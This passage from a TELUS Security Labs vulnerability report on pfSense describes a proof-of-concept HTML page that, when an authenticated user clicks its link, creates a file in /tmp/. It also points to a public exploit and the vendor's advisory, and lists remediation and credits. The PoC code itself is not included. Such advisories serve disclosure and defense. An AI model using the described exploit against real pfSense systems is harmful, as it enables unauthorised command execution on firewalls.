TELUS Security Labs has provided a proof-of-concept poc.html to illustrate the impact of this vulnerability. To
trigger the vulnerability, click the hyperlink embedded within the HTML. Upon processing, a file named "test" should
be created in the "/tmp/" directory of pfSense.
Note that before this POC is used the "<target-ip>" string should be replaced with the IP address of the machine
running pfSense. The user clicking on the hyperlink should be an authenticated pfSense user.
8. Public Exploits
8.1. Public Exploit [SA]
8.1.1. Exploit overview
The discoverer has published a proof of concept exploit demonstrating this vulnerability. The vulnerability has
been made available via:
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
9. Remediation Details
The risks posed by this vulnerability can be mitigated or eliminated by:
Filtering attack traffic using information provided in the "Attack detection" section.
The vendor has released the following advisory regarding this vulnerability:
https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
11. Credits
Principal contributors, researchers, and reviewers for this report include the following members of the TELUS
Security Labs Research Team:
Vincent Lee
Sivathmican Sivakumaran